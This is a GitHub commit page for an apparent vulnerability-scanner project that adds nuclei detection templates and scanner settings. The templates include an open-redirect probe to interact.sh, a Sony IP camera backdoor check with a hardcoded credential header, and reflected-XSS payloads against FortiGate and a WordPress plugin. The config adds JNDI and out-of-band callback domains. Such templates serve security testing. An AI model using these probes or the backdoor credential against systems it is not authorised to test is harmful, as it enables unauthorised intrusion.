Skip to content

Commit daaaf3b

Browse files
committed
1、Up PoCs
2、Refactor the engine model 3、add async do cmd 4、Optimize masscan code 2022-09-24
1 parent b7ee32c commit daaaf3b

File tree

94 files changed

+1507
-238
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

94 files changed

+1507
-238
lines changed

.github/build/linux.yml

Lines changed: 10 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -16,16 +16,16 @@ builds:
1616
- linux
1717
goarch:
1818
- amd64
19-
- mips
20-
- mips64
21-
- mips64le
22-
- mipsle
23-
- ppc64
24-
- ppc64le
25-
- riscv64
26-
- s390x
27-
- arm
28-
- arm64
19+
# - mips
20+
# - mips64
21+
# - mips64le
22+
# - mipsle
23+
# - ppc64
24+
# - ppc64le
25+
# - riscv64
26+
# - s390x
27+
# - arm
28+
# - arm64
2929
archives:
3030
- format: zip
3131

.github/workflows/build.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -39,7 +39,7 @@ jobs:
3939
with:
4040
go-version: 1.18
4141
- name: Install Dependences
42-
run: sudo apt install -yy libpcap-dev upx
42+
run: sudo apt install -yy libpcap-dev upx gcc-aarch64-linux-gnu g++-aarch64-linux-gnu
4343

4444
- name: Run GoReleaser
4545
uses: goreleaser/goreleaser-action@v2

brute/fuzzAI.go

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -55,7 +55,7 @@ func init() {
5555
asz404Url = aT1 // 容错
5656
}
5757
}
58-
util.GetDb(&ErrPage{})
58+
util.InitDb(&ErrPage{})
5959
})
6060
}
6161

config/config.json

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,7 @@
11
{
2+
"ScanPoolSize":5000,
3+
"JndiAddress": "https://rcejndi.51pwn.com",
4+
"CeyeDomain": "scan4all.51pwn.com",
25
"CacheName": ".DbCache",
36
"autoRmCache": "true",
47
"ssh_username": "pkg/hydra/dicts/ssh_user.txt",
Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
id: CVE-2016-10368
2+
3+
info:
4+
name: Opsview Monitor Pro 4.5.x - Open Redirect
5+
author: 0x_Akoko
6+
severity: medium
7+
description: |
8+
Open redirect vulnerability in Opsview Monitor Pro (Prior to 5.1.0.162300841 prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
9+
reference:
10+
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774
11+
- https://nvd.nist.gov/vuln/detail/CVE-2016-10368
12+
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341
13+
classification:
14+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15+
cvss-score: 6.1
16+
cve-id: CVE-2016-10368
17+
cwe-id: CWE-601
18+
tags: cve,cve2016,redirect,opsview,authenticated
19+
20+
requests:
21+
- raw:
22+
- |
23+
POST /login HTTP/1.1
24+
Host: {{Hostname}}
25+
Content-Type: application/x-www-form-urlencoded
26+
27+
login_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW
28+
29+
matchers-condition: and
30+
matchers:
31+
- type: regex
32+
part: header
33+
regex:
34+
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
35+
36+
- type: status
37+
status:
38+
- 302
Lines changed: 44 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
id: CVE-2016-7834
2+
3+
info:
4+
name: Sony IPELA Engine IP Camera - Harcoded Account
5+
author: af001
6+
severity: high
7+
description: |
8+
Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.
9+
reference:
10+
- https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/
11+
- https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/
12+
- https://jvn.jp/en/vu/JVNVU96435227/index.html
13+
- https://nvd.nist.gov/vuln/detail/CVE-2016-7834
14+
remediation: |
15+
Upgrade to the latest version of the firmware provided by Sony.
16+
classification:
17+
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
18+
cvss-score: 8.8
19+
cve-id: CVE-2016-7834
20+
cwe-id: CWE-200
21+
tags: sony,backdoor,unauth,telnet,iot,camera
22+
23+
requests:
24+
- method: GET
25+
path:
26+
- "{{BaseURL}}/command/prima-factory.cgi"
27+
28+
headers:
29+
Authorization: Bearer cHJpbWFuYTpwcmltYW5h
30+
31+
matchers-condition: and
32+
matchers:
33+
- type: word
34+
part: header
35+
words:
36+
- 'gen5th'
37+
- 'gen6th'
38+
condition: or
39+
40+
- type: status
41+
status:
42+
- 204
43+
44+
# Enhanced by cs 09/23/2022
Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
id: CVE-2017-14186
2+
3+
info:
4+
name: FortiGate SSL VPN Web Portal - Cross Site Scripting
5+
author: johnk3r
6+
severity: medium
7+
description: |
8+
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
9+
reference:
10+
- https://www.fortiguard.com/psirt/FG-IR-17-242
11+
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
12+
classification:
13+
cve-id: CVE-2017-14186
14+
metadata:
15+
verified: true
16+
shodan-query: port:10443 http.favicon.hash:945408572
17+
tags: cve,cve2017,fortigate,xss,fortinet
18+
19+
requests:
20+
- method: GET
21+
path:
22+
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
23+
24+
matchers-condition: and
25+
matchers:
26+
- type: word
27+
part: body
28+
words:
29+
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
30+
31+
- type: word
32+
part: header
33+
words:
34+
- "text/html"
35+
36+
- type: status
37+
status:
38+
- 200

config/nuclei-templates/cves/2018/CVE-2018-1000671.yaml

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,6 @@ info:
77
description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.
88
reference:
99
- https://github.com/sympa-community/sympa/issues/268
10-
- https://www.cvedetails.com/cve/CVE-2018-1000671
1110
- https://vuldb.com/?id.123670
1211
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000671
1312
classification:

config/nuclei-templates/cves/2018/CVE-2018-10956.yaml

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -9,7 +9,6 @@ info:
99
reference:
1010
- https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
1111
- https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb
12-
- https://www.cvedetails.com/cve/CVE-2018-10956
1312
- https://www.exploit-db.com/exploits/44916/
1413
- https://nvd.nist.gov/vuln/detail/CVE-2018-10956
1514
classification:

config/nuclei-templates/cves/2018/CVE-2018-12300.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@ info:
77
description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter.
88
reference:
99
- https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
10-
- https://www.cvedetails.com/cve/CVE-2018-12300
10+
- https://nvd.nist.gov/vuln/detail/CVE-2018-12300
1111
classification:
1212
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1313
cvss-score: 6.1

config/nuclei-templates/cves/2018/CVE-2018-14931.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@ info:
77
description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.
88
reference:
99
- https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html
10-
- https://www.cvedetails.com/cve/CVE-2018-14931
10+
- https://nvd.nist.gov/vuln/detail/CVE-2018-14931
1111
classification:
1212
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1313
cvss-score: 6.1

config/nuclei-templates/cves/2018/CVE-2018-16133.yaml

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,6 @@ info:
88
reference:
99
- https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
1010
- http://www.cybrotech.com/
11-
- https://www.cvedetails.com/cve/CVE-2018-16133
1211
- https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
1312
- https://nvd.nist.gov/vuln/detail/CVE-2018-16133
1413
classification:

config/nuclei-templates/cves/2018/CVE-2018-16761.yaml

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -8,9 +8,8 @@ info:
88
Eventum before 3.4.0 has an open redirect vulnerability.
99
reference:
1010
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
11-
- https://github.com/eventum/eventum/
12-
- https://www.cvedetails.com/cve/CVE-2018-16761/
1311
- https://github.com/eventum/eventum/releases/tag/v3.4.0
12+
- https://nvd.nist.gov/vuln/detail/CVE-2018-16761
1413
classification:
1514
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1615
cvss-score: 6.1

config/nuclei-templates/cves/2018/CVE-2018-18323.yaml

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -9,7 +9,6 @@ info:
99
reference:
1010
- https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html
1111
- http://centos-webpanel.com/
12-
- https://www.cvedetails.com/cve/CVE-2018-18323
1312
- https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/
1413
- https://nvd.nist.gov/vuln/detail/CVE-2018-18323
1514
classification:

config/nuclei-templates/cves/2018/CVE-2018-19386.yaml

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,6 @@ info:
66
severity: medium
77
description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
88
reference:
9-
- https://www.cvedetails.com/cve/CVE-2018-19386/
109
- https://i.imgur.com/Y7t2AD6.png
1110
- https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
1211
- https://nvd.nist.gov/vuln/detail/CVE-2018-19386

config/nuclei-templates/cves/2018/CVE-2018-19458.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -8,9 +8,9 @@ info:
88
PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).
99
reference:
1010
- https://www.exploit-db.com/exploits/45780
11-
- https://www.cvedetails.com/cve/CVE-2018-19458
1211
- https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html
1312
- https://nvd.nist.gov/vuln/detail/CVE-2018-19458
13+
- https://www.exploit-db.com/exploits/45780/
1414
classification:
1515
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1616
cvss-score: 7.5

config/nuclei-templates/cves/2018/CVE-2018-20985.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@ info:
88
reference:
99
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
1010
- https://wordpress.org/plugins/wp-payeezy-pay/#developers
11-
- https://www.cvedetails.com/cve/CVE-2018-20985/
11+
- https://nvd.nist.gov/vuln/detail/CVE-2018-20985
1212
classification:
1313
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1414
cvss-score: 9.8

config/nuclei-templates/cves/2018/CVE-2018-6008.yaml

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,6 @@ info:
77
description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
88
reference:
99
- https://www.exploit-db.com/exploits/43913
10-
- https://www.cvedetails.com/cve/CVE-2018-6008
1110
- https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html
1211
- https://nvd.nist.gov/vuln/detail/CVE-2018-6008
1312
classification:

config/nuclei-templates/cves/2018/CVE-2018-8719.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -8,8 +8,8 @@ info:
88
reference:
99
- https://www.exploit-db.com/exploits/44371
1010
- https://vuldb.com/?id.115817
11-
- https://www.cvedetails.com/cve/CVE-2018-8719/
1211
- https://www.exploit-db.com/exploits/44371/
12+
- https://nvd.nist.gov/vuln/detail/CVE-2018-8719
1313
classification:
1414
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1515
cvss-score: 5.3
Lines changed: 55 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
id: CVE-2021-25104
2+
3+
info:
4+
name: Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting
5+
author: Akincibor
6+
severity: medium
7+
description: The plugin does not escape generated links which are then used when the OceanWP theme is active, leading to a Reflected Cross-Site Scripting issue.
8+
reference:
9+
- https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558
10+
- https://wordpress.org/plugins/ocean-extra/
11+
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25104
12+
- https://nvd.nist.gov/vuln/detail/CVE-2021-25104
13+
remediation: Fixed in version 1.9.5
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
16+
cvss-score: 6.1
17+
cve-id: CVE-2021-25104
18+
cwe-id: CWE-79
19+
metadata:
20+
verified: "true"
21+
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra
22+
23+
requests:
24+
- raw:
25+
- |
26+
POST /wp-login.php HTTP/1.1
27+
Host: {{Hostname}}
28+
Origin: {{RootURL}}
29+
Content-Type: application/x-www-form-urlencoded
30+
Cookie: wordpress_test_cookie=WP%20Cookie%20check
31+
32+
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
33+
34+
- |
35+
GET /wp-admin/?step=demo&page=owp_setup&a"><script>alert(/XSS/)</script> HTTP/1.1
36+
Host: {{Hostname}}
37+
38+
cookie-reuse: true
39+
matchers-condition: and
40+
matchers:
41+
- type: word
42+
part: body
43+
words:
44+
- 'OceanWP'
45+
- '><script>alert(/XSS/)</script>'
46+
condition: and
47+
48+
- type: word
49+
part: header
50+
words:
51+
- text/html
52+
53+
- type: status
54+
status:
55+
- 200

0 commit comments

Comments
 (0)